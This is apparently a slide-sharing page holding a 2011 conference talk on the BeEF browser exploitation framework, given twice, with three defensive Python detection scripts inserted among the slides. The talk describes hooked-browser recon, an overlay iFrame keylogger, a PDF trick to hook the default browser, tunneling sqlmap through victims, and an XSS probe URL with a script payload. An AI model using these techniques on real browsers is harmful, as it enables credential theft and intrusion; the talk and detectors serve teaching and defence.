Ground BeEF: Cutting, devouring and digesting the legs off a browser

Michele "antisnatchor" Orru'
6 September 2011
Who am I?
✴ Penetration Tester @ The Royal Bank of Scotland
✴ BeEF developer: Tunneling Proxy, XssRays integration, various exploits, lots of bug-fixing, testing and fun
✴ Kubrick fan
✴ Definitely not a fan of our Italian prime minister Silvio "bunga-bunga" Berlusconi
✴ @antisnatchor
✴ http://antisnatchor.com
Outline
✴ What the hell is BeEF?
✴ Cutting
    Target enumeration and analysis
✴ Devouring
    Internal net fingerprint
    Exploiting internal services through the hooked browser
    Keylogging, browser pwnage
✴ Digesting
    Persistence, tunneling sqlmap/Burp through the BeEF proxy
    XssRays integration
✴ Future development and ideas
What the hell is BeEF?
✴ BeEF: Browser Exploitation Framework
✴ Pioneered by Wade Alcorn in 2005 (public release)
✴ Powerful platform for client-side pwnage, XSS post-exploitation and, generally, abuse of the victim browser's security context
✴ Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors.
✴ The framework allows the penetration tester to select specific modules (in real time) to target each browser, and therefore each context.
Cutting: Target enum and analysis
✴ Lots of juicy information right after the first hook initialization:
    ✴ Browser/OS version
    ✴ Cookies
    ✴ Browser plugins
    ✴ Supported features (Google Gears, Web Sockets, Flash, Java, ...)

✴ Specific modules are also there to help:
    ✴ Detect links/visited URLs
    ✴ Detect social networks (authenticated in Twitter, Gmail, Facebook) and Tor
    ✴ Execute your custom JavaScript
Devouring: Internal net fingerprint
Recon/NetworkFingerprinting module
✴ Knowing the victim's internal IP, the attacker can start to fingerprint the internal network via JavaScript to find common servers and devices.
✴ The approach currently in use is similar to Yokoso (InGuardians):
    ✴ Map of device/application default images
    ✴ img tags are loaded into the victim DOM
    ✴ On the onload event, if (image width/height/path == deviceImageMapEntry), then deviceXYZ@IP has been successfully found

✴ Watch "Jboss 6.0.0M1 JMX Deploy Exploit: the BeEF way..." on Vimeo (http://vimeo.com/24410203) for a practical example
Devouring: Internal net fingerprint
✴ Great preso "Intranet Footprinting" by Javier Marcos and Juan Galiana (OWASP AppSec EU 2011)

✴ They developed new BeEF modules
✴ They are working with us and their work will be available in BeEF trunk soon. A few examples:
    ✴ Internal DNS enumeration
    ✴ Reliable port scanning
    ✴ Ping sweep
Devouring: exploiting internal services
✴ Network/JbossJmxUploadExploit module
✴ The JBoss 4.x, 5.1.0, 6.0.0.M1 JMX deploy exploit is available in MSF, but you need direct access to the target (or have to use a host as a pivot)

✴ Then why not use the victim browser as a pivot?
Devouring: persistent keylogging
Persistence/iFrameKeylogger module
✴ We can inject a 100% width/height overlay iFrame that loads the login page (in-domain), attaching a listener for keyboard events (keylogger) in JS.

✴ After the victim logs in, she will stay in the injected iFrame while the communication channel stays persistent in the background.
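The overlay works because the login page is loaded in-domain, so X-Frame-Options: SAMEORIGIN does not stop it, and because the injected listener is inline script. The following checker is an added example (not BeEF code, and not the module above) that reviews a page's response headers for exactly those two properties: whether a same-origin page may frame it, and whether injected inline script may run. The header sets WEAK_HEADERS and HARDENED_HEADERS are constructed for the example.

```python
"""Added example: review response headers against the in-domain overlay iFrame
keylogger. Two questions: can a page on the same origin frame this one, and
can injected inline script run at all? Only CSP frame-ancestors without 'self'
(or X-Frame-Options: DENY) closes the first; a script-src that does not allow
'unsafe-inline' (or uses nonces/hashes) closes the second.
Header sets below are constructed for the example, not captured."""

# Source keywords that make browsers ignore 'unsafe-inline' (CSP level 2+).
STRICT_PREFIXES = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")

# Constructed: a typical 2011-era login page versus a hardened one.
WEAK_HEADERS = {"X-Frame-Options": "SAMEORIGIN"}
HARDENED_HEADERS = {
    "Content-Security-Policy":
        "default-src 'self'; script-src 'self'; frame-ancestors 'none'",
}


def parse_csp(value):
    """Return {directive: [sources]} from a Content-Security-Policy value."""
    policy = {}
    for part in value.split(";"):
        tokens = part.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def review_headers(headers):
    """Return a list of findings for a dict of response headers."""
    h = {k.lower(): v for k, v in headers.items()}
    csp = parse_csp(h.get("content-security-policy", ""))
    findings = []

    # Framing: frame-ancestors wins when present, otherwise fall back to XFO.
    ancestors = csp.get("frame-ancestors")
    if ancestors is None:
        xfo = h.get("x-frame-options", "").strip().upper()
        if xfo == "SAMEORIGIN":
            findings.append("X-Frame-Options: SAMEORIGIN still allows an "
                            "in-domain overlay iFrame")
        elif xfo != "DENY":
            findings.append("no framing restriction: any page can frame this one")
    elif "'self'" in ancestors or "*" in ancestors:
        findings.append("frame-ancestors permits same-origin framing: "
                        "an in-domain overlay iFrame is possible")

    # Inline script: this is what the injected keyboard listener relies on.
    script_src = csp.get("script-src", csp.get("default-src"))
    if script_src is None:
        findings.append("no script-src or default-src: injected inline scripts run")
    elif ("'unsafe-inline'" in script_src
          and not any(s.startswith(STRICT_PREFIXES) for s in script_src)):
        findings.append("script-src allows 'unsafe-inline' without nonces/hashes: "
                        "injected inline scripts run")
    return findings


if __name__ == "__main__":
    for name, hdrs in (("weak", WEAK_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(name, review_headers(hdrs) or ["no findings"])
```

DENY / frame-ancestors 'none' fits a login page that is never meant to be embedded anywhere; the root cause remains the XSS that lets the iFrame be injected, which is what the script-src check covers.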
Devouring: module autorun
✴ We've ported back (from the old PHP version) the autorun feature
✴ Add autorun: true in the config.yaml of the command module you want to autorun
✴ When a new browser is hooked in BeEF, the module will be launched automatically

✴ Imagine adding autorun: true in the Metasploit autopwn module (another feature ported back)...
Digesting: hook default browser
✴ Originally disclosed by Billy (xs-sniper) Rios in "Expanding the Attack Surface"
Browser/HookDefault module
✴ We use a PDF in order to attempt hooking the default browser
✴ When executed, the hooked browser will load a PDF in a new window and use that to start the default browser.
    ✴ app.launchURL("http://192.168.56.1/page-With-BeEF-Hook-Js.html",true);
    ✴ If everything goes ok, we have hooked the default browser.

✴ We are planning to improve it:
    ✴ make the bounce page configurable by the user
    ✴ use a Ruby PDF library in order to manipulate the PDF via the web UI
Digesting: tunneling proxy
✴ Having a communication channel with the hooked browser, we can:
    ✴ Receive requests as a proxy on BeEF
    ✴ Translate these requests to XHRs (in-domain)
    ✴ Parse the XHR responses and send the data back to the original requestor...

✴ Using the victim browser hooked in BeEF as a tunneling proxy, we will see the following scenarios:
    ✴ browsing the authenticated surface of the hooked domain through the security context of the victim browser;
    ✴ spidering the hooked domain through the security context of the victim browser;
    ✴ finding and exploiting SQLi with Burp Pro Scanner + sqlmap (through the victim browser too :-) ).
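Both the img-tag network fingerprint (Recon/NetworkFingerprinting) and the tunneling proxy leave traces on the internal systems they touch: a probed device serves its default images to a page on a foreign origin, and a spidered application sees one session cookie walk a large part of its surface in seconds. The script below is an added example (not BeEF code) with two detections over an intranet web server's access log. It assumes a combined log format with the vhost first and the Cookie header appended as a last quoted field; the log lines, hosts and session ids are constructed.

```python
"""Added example, not BeEF's own code: two detections over an intranet web
server's access log. image_probe_findings() flags default device/application
images fetched with a Referer from another host (what an img-tag fingerprint
looks like from the probed device). session_burst_findings() flags one session
cookie requesting many distinct paths within a short window (what spidering
through a hooked browser looks like in the application's own log).
Assumed format: combined log, vhost first, Cookie header as the last quoted
field. Every line in SAMPLE_LOG is constructed."""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit

SAMPLE_LOG = """\
192.168.1.10 10.0.0.55 - - [06/Sep/2011:10:15:01 +0200] "GET /images/logo.png HTTP/1.1" 200 4521 "http://192.168.1.10/login" "Mozilla/5.0" "-"
192.168.1.20 10.0.0.55 - - [06/Sep/2011:10:15:02 +0200] "GET /images/jboss_logo.gif HTTP/1.1" 200 1203 "http://evil.example.net/landing" "Mozilla/5.0" "-"
192.168.1.21 10.0.0.55 - - [06/Sep/2011:10:15:02 +0200] "GET /web/images/printer.gif HTTP/1.1" 200 877 "http://evil.example.net/landing" "Mozilla/5.0" "-"
192.168.1.10 10.0.0.55 - - [06/Sep/2011:10:16:00 +0200] "GET /app/home HTTP/1.1" 200 3000 "-" "Mozilla/5.0" "JSESSIONID=ABC123"
192.168.1.10 10.0.0.55 - - [06/Sep/2011:10:16:01 +0200] "GET /app/users HTTP/1.1" 200 3000 "-" "Mozilla/5.0" "JSESSIONID=ABC123"
192.168.1.10 10.0.0.55 - - [06/Sep/2011:10:16:01 +0200] "GET /app/users?id=1 HTTP/1.1" 200 3000 "-" "Mozilla/5.0" "JSESSIONID=ABC123"
192.168.1.10 10.0.0.55 - - [06/Sep/2011:10:16:02 +0200] "GET /app/admin HTTP/1.1" 403 512 "-" "Mozilla/5.0" "JSESSIONID=ABC123"
192.168.1.10 10.0.0.55 - - [06/Sep/2011:10:16:02 +0200] "GET /app/reports HTTP/1.1" 200 3000 "-" "Mozilla/5.0" "JSESSIONID=ABC123"
192.168.1.10 10.0.0.55 - - [06/Sep/2011:10:16:03 +0200] "GET /app/export HTTP/1.1" 200 3000 "-" "Mozilla/5.0" "JSESSIONID=ABC123"
192.168.1.10 10.0.0.55 - - [06/Sep/2011:10:16:03 +0200] "GET /app/settings HTTP/1.1" 200 3000 "-" "Mozilla/5.0" "JSESSIONID=ABC123"
192.168.1.10 10.0.0.99 - - [06/Sep/2011:10:16:05 +0200] "GET /app/home HTTP/1.1" 200 3000 "-" "Mozilla/5.0" "JSESSIONID=DEF456"
192.168.1.10 10.0.0.99 - - [06/Sep/2011:10:16:40 +0200] "GET /app/users HTTP/1.1" 200 3000 "-" "Mozilla/5.0" "JSESSIONID=DEF456"
"""

LINE_RE = re.compile(
    r'^(?P<host>\S+) (?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$'
)
IMAGE_EXT = (".gif", ".png", ".jpg", ".jpeg", ".ico")
SESSION_RE = re.compile(r"(?:^|;\s*)(?:JSESSIONID|PHPSESSID|session)=([^;]+)")


def parse_log(text):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
        rec["path"] = urlsplit(rec["target"]).path  # query string dropped
        yield rec


def _is_private_host(host):
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False  # named vhosts would need a site-specific allowlist


def image_probe_findings(text):
    """(host, image path, referer host) for images served by a private-IP host
    to a page whose Referer is on a different host."""
    findings = []
    for rec in parse_log(text):
        if not rec["path"].lower().endswith(IMAGE_EXT):
            continue
        ref_host = urlsplit(rec["referer"]).hostname  # None for "-"
        if ref_host and ref_host != rec["host"] and _is_private_host(rec["host"]):
            findings.append((rec["host"], rec["path"], ref_host))
    return findings


def session_burst_findings(text, window_s=30, threshold=5):
    """{session id: max distinct paths seen within window_s} for sessions that
    reach threshold distinct paths in any window."""
    by_session = defaultdict(list)
    for rec in parse_log(text):
        m = SESSION_RE.search(rec["cookie"])
        if m:
            by_session[m.group(1)].append((rec["time"], rec["path"]))
    flagged = {}
    for sid, hits in by_session.items():
        hits.sort()
        best = 0
        for i, (t0, _) in enumerate(hits):  # window starting at each request
            seen = {p for t, p in hits[i:] if (t - t0).total_seconds() <= window_s}
            best = max(best, len(seen))
        if best >= threshold:
            flagged[sid] = best
    return flagged


if __name__ == "__main__":
    for host, path, ref in image_probe_findings(SAMPLE_LOG):
        print(f"image probe: {host}{path} loaded by a page on {ref}")
    for sid, n in session_burst_findings(SAMPLE_LOG).items():
        print(f"session {sid}: {n} distinct paths within 30s")
```

The Referer check is the cheap signal: a browser loading a device's default image for fingerprinting sends the Referer of the page it is hooked on, which is not the device itself. The burst detector only sees traffic that is already authenticated with the victim's session, so its threshold has to be tuned against what a real user of that application does in 30 seconds.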
Digesting: tunneling proxy

Let's see the tunneling proxy in action!
Digesting: XssRays
✴ Originally developed by Gareth Heyes in 2009 as a pure JS-based XSS scanner
✴ The XssRays BeEF extension allows you to check if links, forms and URI paths of the page where the browser is hooked are vulnerable to XSS.

✴ What XssRays does is basically parse all the links and forms of the page where it is loaded and check for XSS in GET and POST parameters, and also in the URI path.

✴ The original code by Gareth, from 2009, used a nice trick (the location.hash fragment) in order to have a sort of callback between parent and child iFrames
✴ This is now patched by all recent browsers.
So how do we check for XSS cross-domain while respecting the SOP restrictions?
Digesting: XssRays
✴ We inject a vector that contacts BeEF back if the JS code is successfully executed (thus confirming the XSS).

✴ No false positives (oh yes, that's what I like)!
✴ Basically the document.location.href of the injected iFrame that contains the vector will point to a known BeEF resource. The following is an example value of href:
✴ http://192.168.84.1:3000/ui/xssrays/rays?hbsess=ZdGQG32VvYmozDP3ia0mvNd5PwcjR9lXuzmTmxm1mAckrgjqA9bIfg41Si2eOfVpviNWYk9vi2q3kvZB&raysscanid=3&poc=http://192.168.84.128/dvwa/vulnerabilities/xss_r/?name=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&&name=Standard%20script%20injection%20double&method=GET

✴ Next step is multihooking: hook a browser on multiple domains, to extend the attack surface.
Digesting: XssRays in a nutshell
Future dev and ideas

✴ Improve XssRays:
    ✴ add more attack vectors, more testing
    ✴ add a JS depth crawler
✴ Multi-hooking: a browser can be hooked on multiple domains
✴ Check for time-based blind SQLi cross-domain via JS
✴ Improve the BeEF console (command line UI)
✴ Well... take a look here: http://code.google.com/p/beef/issues/list
Get in touch with us

✴ Follow the BeEF: @beefproject
✴ Check out BeEF: http://code.google.com/p/beef/
✴ Check our website: http://beefproject.com
✴ Have fun with it
✴ We're hiring!!! (but we'll not pay you... seriously, we have so many tasks to do, join us)
Thanks to

✴ Wade Alcorn and the other BeEF ninjas: Ben, Scotty, Christian, Brendan, Saafan, ...
✴ My colleagues Piotr & Michal
✴ My employer
✴ SecurityByte crew and you attendees
Questions?

Thanks for your time guys ;-)

 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 

Be ef presentation-securitybyte2011-michele_orru

  • 1. Ground BeEF: Cutting, devouring and digesting the legs off a browser Michele „antisnatchor” Orru’ 6 September 2011
  • 2. Who am I? ✴ Penetration Tester @ The Royal Bank of Scotland ✴ BeEF developer: Tunneling Proxy, XssRays integration, various exploits, lot of bug-fixing, testing and fun ✴ Kubrick fan ✴ Definitely not a fan of our Italian prime minister Silvio „bunga-bunga” Berlusconi ✴@antisnatchor ✴http://antisnatchor.com
  • 3. Outline ✴ What the hell is BeEF? ✴Cutting Target enumeration and analysis ✴Devouring Internal net fingerprint Exploiting internal services through the hooked browser Keylogging, browser pwnage ✴Digesting Persistence, tunneling sqlmap/Burp through BeEF proxy XSSrays integration ✴Future development and ideas
  • 4. What the hell is BeEF? ✴ BeEF: Browser Exploitation Framework ✴Pioneered by Wade Alcorn in 2005 (public release) ✴Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim browser security-context abuse ✴Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors. ✴ The framework allows the penetration tester to select specific modules (in real-time) to target each browser, and therefore each context.
  • 5. What the hell is BeEF?
  • 6. Cutting: Target enum and analysis ✴ Lot of juicy information after first hook initialization : ✴Browser/OS version ✴Cookies ✴Browser plugins ✴Supported features (Google Gears, Web Sockets, Flash, Java, . .) ✴Specific modules are also there to help ✴Detect links/visited URLs ✴Detect social networks (authenticated in Twitter, Gmail, Facebook) and Tor ✴Execute your custom Javascript
  • 7. Cutting: Target enum and analysis
  • 8. Devouring: Internal net fingerprint Recon/NetworkFingerprinting module ✴Knowing the victim internal IP, the attacker can start to fingerprint the internal network via Javascript to find common servers and devices. ✴The approach currently in use is similar to Yokoso (InGuardians) ✴Map of device/application default images ✴img tags are loaded into the victim DOM ✴Onload event, if (image width/height/path == deviceImageMapEntry), then deviceXYZ@IP has been successfully found ✴Watch „Jboss 6.0.0M1 JMX Deploy Exploit: the BeEF way... ” on Vimeo (http://vimeo.com/24410203) for a practical example
  • 9. Devouring: Internal net fingerprint ✴ Great preso „Intranet Footprinting” by Javier Marcos and Juan Galiana (Owasp AppSec Eu 2011) ✴ They developed new BeEF modules ✴They are working with us and their work will be available in BeEF trunk soon. A few examples: ✴Internal DNS enumeration ✴Reliable Port Scanning ✴Ping sweep
  • 10. Devouring: exploiting internal services ✴Network/JbossJmxUploadExploit module ✴JBoss 4.x, 5.1.0, 6.0.0.M1 JMX deploy exploit is available in MSF, but you need to have direct access to the target (or use a host as a pivot) ✴Then why not use the victim browser as a pivot?
  • 11. Devouring: persistent keylogging Persistence/iFrameKeylogger module ✴We can inject a 100% width/height overlay iFrame that loads the login page (in-domain), attaching a listener for keyboard events (keylogger) in JS. ✴After the victim logs in, she will stay in the injected iFrame while the communication channel will be persistent in the background.
  • 12. Devouring: module autorun ✴ We’ve ported back (from the old PHP version) the autorun feature ✴Add autorun: true in the config.yaml of the command module that you want to autorun ✴When a new browser is hooked in BeEF, the module is launched automatically ✴Imagine adding autorun: true in the Metasploit autopwn module (another feature ported back)...
  • 13. Digesting: hook default browser ✴Originally disclosed by Billy (xs-sniper) Rios in „Expanding the Attack Surface” Browser/HookDefault module ✴We use a PDF in order to attempt hooking the default browser ✴When executed, the hooked browser will load a PDF in a new window and use that to start the default browser. ✴app.launchURL("http://192.168.56.1/page-With-BeEF-Hook-Js.html",true); ✴If everything goes ok, we have hooked the default browser. ✴We are planning to improve it: ✴make the bounce page configurable by the user ✴use a ruby PDF library in order to manipulate the PDF via the web UI
  • 14. Digesting: tunneling proxy ✴Having a communication channel with the hooked browser, we can: ✴Receive requests as a proxy on BeEF ✴Translate these requests to XHRs (in-domain) ✴Parse the XHRs responses and send the data back to the original requestor... ✴Using the victim browser hooked in BeEF as a tunneling proxy, we will see the following scenarios: ✴browsing the authenticated surface of the hooked domain through the security context of the victim browser; ✴spidering the hooked domain through the security context of the victim browser; ✴finding and exploiting SQLi with Burp Pro Scanner + sqlmap (through the victim browser too :-) ).
  • 15. Digesting: tunneling proxy Let’s see the tunneling proxy in action!
  • 16. Digesting: XssRays ✴ Originally developed by Gareth Heyes in 2009 as a pure JS-based XSS scanner ✴ The XssRays BeEF extension allows you to check if links, forms and URI paths of the page where the browser is hooked are vulnerable to XSS. ✴What XssRays does is basically parse all the links and forms of the page where it is loaded and check for XSS in GET and POST parameters, and also in the URI path. ✴The original code by Gareth, from 2009, used a nice trick (the location.hash fragment) in order to have a sort of callback between parent and child iFrames ✴This is now patched by all recent browsers. So how to check for XSS cross-domain, respecting the SOP restrictions?
  • 17. Digesting: XssRays ✴We inject a vector that will contact BeEF back if the JS code is successfully executed (thus, the XSS is confirmed). ✴No false positives (oh yes, that’s what I like)! ✴Basically the document.location.href of the injected iFrame that contains the vector will point to a known BeEF resource. The following is an example value of href: ✴http://192.168.84.1:3000/ui/xssrays/rays?hbsess=ZdGQG32VvYmozDP3ia0mvNd5PwcjR9lXuzmTmxm1mAckrgjqA9bIfg41Si2eOfVpviNWYk9vi2q3kvZB&raysscanid=3&poc=http://192.168.84.128/dvwa/vulnerabilities/xss_r/?name=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&&name=Standard%20script%20injection%20double&method=GET ✴Next step is multihooking: hook a browser on multiple domains, to extend the attack surface.
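Seen from the target application's side, the two techniques on slides 14 and 16-17 leave distinct traces in the web server's access log: the XssRays probes arrive as requests whose query parameters carry script payloads (the `poc` URL above is exactly such a request), and spidering through the tunneling proxy shows up as one authenticated session touching many distinct paths in a short burst. The following detection logic is an added example written for this page, not code from BeEF or its authors; the combined-log-plus-session-cookie line format, the log lines themselves, the 60-second window and the threshold of 10 distinct paths are all constructed assumptions.

```python
"""Flag reflected-XSS probe payloads in query strings and per-session path
bursts in constructed access-log lines. Added example; the log format
(combined log with a trailing sess= field), sample lines and thresholds are
assumptions made for this illustration, not BeEF code."""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote, urlsplit

# Combined log format with one extra field carrying the session cookie (assumed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ sess=(?P<sess>\S+)$'
)

# Patterns applied to URL-decoded parameter values; order matters, first match wins.
XSS_PROBE_PATTERNS = [
    (re.compile(r'<\s*script', re.I), "script tag"),
    (re.compile(r'javascript\s*:', re.I), "javascript: URI"),
    (re.compile(r'<\s*(img|svg|iframe)\b', re.I), "injected element"),
    (re.compile(r'\bon[a-z]+\s*=', re.I), "inline event handler"),
]

# Constructed sample log: one probe in session abc123, a 12-path burst in def456,
# a normal slow session ghi789 and one malformed line that must be skipped.
SAMPLE_LOG = "\n".join(
    [
        '10.0.0.5 - - [06/Sep/2011:10:00:01 +0000] "GET /dvwa/vulnerabilities/xss_r/?name=Bob HTTP/1.1" 200 512 sess=abc123',
        '10.0.0.5 - - [06/Sep/2011:10:00:02 +0000] "GET /dvwa/vulnerabilities/xss_r/?name=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 530 sess=abc123',
        '10.0.0.5 - - [06/Sep/2011:10:00:03 +0000] "GET /dvwa/index.php HTTP/1.1" 200 2048 sess=abc123',
        'this line is deliberately malformed and must be skipped',
        '10.0.0.7 - - [06/Sep/2011:10:10:00 +0000] "GET /app/home.php HTTP/1.1" 200 900 sess=ghi789',
        '10.0.0.7 - - [06/Sep/2011:10:14:00 +0000] "GET /app/profile.php HTTP/1.1" 200 900 sess=ghi789',
        '10.0.0.7 - - [06/Sep/2011:10:18:00 +0000] "GET /app/logout.php HTTP/1.1" 302 0 sess=ghi789',
    ]
    + [
        f'10.0.0.9 - - [06/Sep/2011:10:05:{i:02d} +0000] "GET /app/page{i}.php HTTP/1.1" 200 100 sess=def456'
        for i in range(12)
    ]
)


def parse_line(line):
    """Return a dict for a well-formed line, None for anything else."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["time"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    parts = urlsplit(entry["target"])
    entry["path"], entry["query"] = parts.path, parts.query
    return entry


def decode_twice(value):
    """Scanners often double-encode; decode up to two levels, stop when stable."""
    for _ in range(2):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def xss_probe_hits(entries):
    """(session, path, parameter, pattern label) for each parameter carrying a probe."""
    hits = []
    for e in entries:
        if not e["query"]:
            continue
        for pair in e["query"].split("&"):
            name, _, raw = pair.partition("=")
            value = decode_twice(raw)
            for pattern, label in XSS_PROBE_PATTERNS:
                if pattern.search(value):
                    hits.append((e["sess"], e["path"], name, label))
                    break
    return hits


def spider_bursts(entries, window_s=60, min_distinct=10):
    """Sessions whose peak count of distinct paths in any window_s span meets min_distinct."""
    by_sess = defaultdict(list)
    for e in entries:
        by_sess[e["sess"]].append((e["time"], e["path"]))
    flagged = {}
    for sess, reqs in by_sess.items():
        reqs.sort()
        peak = 0
        for i, (t0, _) in enumerate(reqs):
            in_window = {p for t, p in reqs[i:] if (t - t0).total_seconds() < window_s}
            peak = max(peak, len(in_window))
        if peak >= min_distinct:
            flagged[sess] = peak
    return flagged


def analyze(log_text):
    entries = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    return {
        "parsed": len(entries),
        "xss_probes": xss_probe_hits(entries),
        "spider_sessions": spider_bursts(entries),
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

On the constructed sample this reports the single probe on `/dvwa/vulnerabilities/xss_r/` (parameter `name`, script tag) and flags session `def456` with 12 distinct paths inside one window, while the slow session `ghi789` stays clean. The burst heuristic is deliberately coarse: a legitimate single-page application can also fan out requests quickly, so in practice the threshold is tuned per application and the signal is correlated with the probe hits rather than acted on alone.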
  • 18. Digesting: XssRays in a nutshell
  • 19. Digesting: XssRays in a nutshell
  • 20. Digesting: XssRays in a nutshell
  • 21. Digesting: XssRays in a nutshell
  • 22. Digesting: XssRays in a nutshell
  • 23. Digesting: XssRays in a nutshell
  • 24. Digesting: XssRays in a nutshell
  • 25. Digesting: XssRays in a nutshell
  • 26. Digesting: XssRays in a nutshell
  • 27. Digesting: XssRays in a nutshell
  • 28. Digesting: XssRays in a nutshell
  • 29. Future dev and ideas ✴Improve XssRays: ✴add more attack vectors, more testing ✴add JS depth crawler ✴Multi-hooking: a browser can be hooked on multiple domains ✴Check for time-based blind SQLi cross-domain via JS ✴Improve the BeEF console (command line UI) ✴Well...take a look here: http://code.google.com/p/beef/issues/list
  • 30. Get in touch with us ✴Follow the BeEF: @beefproject ✴Check out BeEF: http://code.google.com/p/beef/ ✴Check our website: http://beefproject.com ✴Have fun with it ✴We’re hiring!!! (but we won’t pay you... seriously, we have so many tasks to do, join us)
  • 31. Thanks to ✴Wade Alcorn and the other BeEF ninjas: Ben, Scotty, Christian, Brendan, Saafan,. . ✴My colleagues Piotr & Michal ✴My employer ✴SecurityByte crew and you attendees
  • 32. Questions? Thanks for your time guys ;-)